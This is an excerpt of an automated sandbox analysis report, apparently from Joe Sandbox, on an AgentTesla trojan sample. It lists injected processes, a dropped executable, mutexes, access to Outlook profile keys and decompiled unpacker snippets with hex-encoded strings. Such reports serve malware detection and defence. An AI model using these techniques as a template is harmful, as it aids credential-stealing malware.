                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeCode function: 0_2_0325E7700_2_0325E770
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeCode function: 0_2_07CA00400_2_07CA0040
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeCode function: 0_2_07CA00210_2_07CA0021
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0121F4009_2_0121F400
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0121F7489_2_0121F748
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067D66789_2_067D6678
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067D5C889_2_067D5C88
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067DBB189_2_067DBB18
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067DCF089_2_067DCF08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067DBD389_2_067DBD38
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067FC6409_2_067FC640
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F62F09_2_067F62F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067FDEA09_2_067FDEA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F3F589_2_067F3F58
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067FAF189_2_067FAF18
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F03D89_2_067F03D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F79189_2_067F7918
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F03749_2_067F0374
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F44059_2_067F4405
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_068745E89_2_068745E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_068722D49_2_068722D4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_068757A09_2_068757A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_068764909_2_06876490
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_068700409_2_06870040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_06872B809_2_06872B80
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeCode function: 14_2_00D118C014_2_00D118C0
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeCode function: 14_2_00D151F914_2_00D151F9
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeCode function: 14_2_00D1237014_2_00D12370
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeCode function: 14_2_00D128A914_2_00D128A9
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeCode function: 16_2_028B237016_2_028B2370
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeCode function: 16_2_028B51F916_2_028B51F9
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeCode function: 16_2_028B1A2F16_2_028B1A2F
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeBinary or memory string: OriginalFilename vs SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.322518240.0000000004891000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLepqEZpPxHlpofwnoTlOFMwRRcJkmnsaAyjbPwx.exeH vs SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.322647809.00000000048F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLepqEZpPxHlpofwnoTlOFMwRRcJkmnsaAyjbPwx.exeH vs SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.316437923.000000000162B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.325563619.0000000007AC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.322233930.0000000004710000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.322403538.00000000047FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLepqEZpPxHlpofwnoTlOFMwRRcJkmnsaAyjbPwx.exeH vs SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeBinary or memory string: OriginalFilenameGeneric.exe4 vs SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: ykVBUY.exe.9.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: ykVBUY.exe.9.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: ykVBUY.exe.9.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe 2CA7CF7146FB8209CF3C6CECB1C5AA154C61E046DC07AFA05E8158F2C0DDE2F6
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeReversingLabs: Detection: 26%
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe "C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe"
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe "C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe"
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.logJump to behavior
                    Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@7/6@1/1
                    Source: ykVBUY.exe.9.dr, Microsoft.Build/CommandLine/OutOfProcTaskHostNode.csTask registration methods: 'RegisterTaskObject', 'UnregisterPacketHandler', 'RegisterPacketHandler', 'UnregisterTaskObject', 'GetRegisteredTaskObject'
                    Source: ykVBUY.exe.9.dr, Microsoft.Build/BackEnd/TaskParameter.csTask registration methods: 'CreateNewTaskItemFrom'
                    Source: ykVBUY.exe.9.dr, Microsoft.Build/Shared/TaskLoader.csTask registration methods: 'CreateTask'
                    Source: ykVBUY.exe.9.dr, Microsoft.Build/Shared/RegisteredTaskObjectCacheBase.csTask registration methods: '.cctor', 'GetLazyCollectionForLifetime', 'RegisterTaskObject', 'DisposeObjects', 'IsCollectionEmptyOrUncreated', '.ctor', 'UnregisterTaskObject', 'DisposeCacheObjects', 'GetRegisteredTaskObject', 'GetCollectionForLifetime'
                    Source: ykVBUY.exe.9.dr, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: ykVBUY.exe.9.dr, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent(System.Boolean)
                    Source: ykVBUY.exe.9.dr, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.csSecurity API names: System.Void System.IO.Pipes.PipeSecurity::AddAccessRule(System.IO.Pipes.PipeAccessRule)
                    Source: 14.2.ykVBUY.exe.550000.0.unpack, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 14.2.ykVBUY.exe.550000.0.unpack, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent(System.Boolean)
                    Source: 14.2.ykVBUY.exe.550000.0.unpack, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.csSecurity API names: System.Void System.IO.Pipes.PipeSecurity::AddAccessRule(System.IO.Pipes.PipeAccessRule)
                    Source: ykVBUY.exe.9.dr, Microsoft.Build/Internal/CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: ykVBUY.exe.9.dr, Microsoft.Build/Internal/CommunicationsUtilities.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 14.2.ykVBUY.exe.550000.0.unpack, Microsoft.Build/Internal/CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 14.2.ykVBUY.exe.550000.0.unpack, Microsoft.Build/Internal/CommunicationsUtilities.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 14.0.ykVBUY.exe.550000.0.unpack, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 14.0.ykVBUY.exe.550000.0.unpack, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent(System.Boolean)
                    Source: 14.0.ykVBUY.exe.550000.0.unpack, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.csSecurity API names: System.Void System.IO.Pipes.PipeSecurity::AddAccessRule(System.IO.Pipes.PipeAccessRule)
                    Source: 14.0.ykVBUY.exe.550000.0.unpack, Microsoft.Build/Internal/CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 14.0.ykVBUY.exe.550000.0.unpack, Microsoft.Build/Internal/CommunicationsUtilities.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1408:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3264:120:WilError_01
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeMutant created: \Sessions\1\BaseNamedObjects\mwyLJQTCzoERzESbkqhGjwVkw
                    Source: ykVBUY.exe, 0000000E.00000002.361590861.0000000002921000.00000004.00000800.00020000.00000000.sdmp, ykVBUY.exe, 00000010.00000002.381074717.00000000029B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: l+C:\Users\user\AppData\Roaming\ykVBUY\*.sln
                    Source: ykVBUY.exe, 0000000E.00000002.361159926.0000000000B93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\AppData\Roaming\ykVBUY\<.sln
                    Source: MSBuild.exe, 00000009.00000003.348393715.00000000061F1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000003.443692265.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.530694770.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, ykVBUY.exe, 0000000E.00000002.360927435.0000000000552000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe.9.drBinary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
                    Source: MSBuild.exe, 00000009.00000003.348393715.00000000061F1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000003.443692265.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.530694770.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, ykVBUY.exe, 0000000E.00000002.360927435.0000000000552000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe.9.drBinary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
                    Source: ykVBUY.exe, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe.9.drBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
                    Source: ykVBUY.exe, 00000010.00000002.380916358.0000000000E42000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Users\user\AppData\Roaming\ykVBUY\<.sln
                    Source: ykVBUY.exe, 0000000E.00000002.361590861.0000000002921000.00000004.00000800.00020000.00000000.sdmp, ykVBUY.exe, 00000010.00000002.381074717.00000000029B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *.slnP#
                    Source: MSBuild.exe, 00000009.00000003.348393715.00000000061F1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000003.443692265.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.530694770.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, ykVBUY.exe, 0000000E.00000002.360927435.0000000000552000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe.9.drBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD
                    Source: ykVBUY.exe, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe, 00000010.00000002.381074717.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, ykVBUY.exe.9.drBinary or memory string: *.sln
                    Source: MSBuild.exe, 00000009.00000003.348393715.00000000061F1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000003.443692265.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.530694770.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, ykVBUY.exe, 0000000E.00000002.360927435.0000000000552000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe.9.drBinary or memory string: MSBuild MyApp.csproj /t:Clean
                    Source: MSBuild.exe, 00000009.00000003.348393715.00000000061F1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000003.443692265.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.530694770.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, ykVBUY.exe, 0000000E.00000002.360927435.0000000000552000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe.9.drBinary or memory string: /ignoreprojectextensions:.sln
                    Source: MSBuild.exe, 00000009.00000003.348393715.00000000061F1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000003.443692265.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.530694770.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, ykVBUY.exe, 0000000E.00000002.360927435.0000000000552000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe.9.drBinary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.
                    Source: 9.0.MSBuild.exe.400000.4.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 9.0.MSBuild.exe.400000.4.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 9.0.MSBuild.exe.400000.1.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 9.0.MSBuild.exe.400000.1.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 9.0.MSBuild.exe.400000.3.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 9.0.MSBuild.exe.400000.3.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: ykVBUY.exe, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe.9.dr
                    Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: MSBuild.exe, 00000009.00000003.348393715.00000000061F1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000003.443692265.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.530694770.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, ykVBUY.exe, 0000000E.00000002.360927435.0000000000552000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe.9.dr

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, loginForm.cs.Net Code: ___________________________________________________ System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.ee0000.0.unpack, loginForm.cs.Net Code: ___________________________________________________ System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 0.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.ee0000.0.unpack, loginForm.cs.Net Code: ___________________________________________________ System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    .NET source code contains method to dynamically call methods (often used by packers)
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, loginForm.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "4173796D6D65747269634B657945786368616E6765466F726D6174", "69626F6B464269", "Client" } }, null, null)
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.ee0000.0.unpack, loginForm.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "4173796D6D65747269634B657945786368616E6765466F726D6174", "69626F6B464269", "Client" } }, null, null)
                    Source: 0.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.ee0000.0.unpack, loginForm.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "4173796D6D65747269634B657945786368616E6765466F726D6174", "69626F6B464269", "Client" } }, null, null)
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeCode function: 0_2_07CA3619 push ebx; retf 0_2_07CA3620
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067DA472 push 8BFFFFFFh; retf 9_2_067DA480
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067D18F7 push es; ret 9_2_067D1910
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067D18AB push es; ret 9_2_067D18C4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067D2177 push edi; retn 0000h9_2_067D2179
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067FDA32 push eax; iretd 9_2_067FDA39
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F5EFD push es; ret 9_2_067F5F34
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F5F7F push es; ret 9_2_067F5F84
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F5FDF push es; ret 9_2_067F5FE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F5FD7 push es; ret 9_2_067F5FD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F5FC7 push es; ret 9_2_067F5FC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F5FBF push es; ret 9_2_067F5FC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F5FB7 push es; ret 9_2_067F5FB8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F5F8F push es; ret 9_2_067F5F90
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F6077 push es; ret 9_2_067F6078
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F606F push es; ret 9_2_067F6070
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F6067 push es; ret 9_2_067F6068
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F605F push es; ret 9_2_067F6060
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F6057 push es; ret 9_2_067F6058
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F604F push es; ret 9_2_067F6050
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F6027 push es; ret 9_2_067F6028
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067F60FF push es; ret 9_2_067F6100
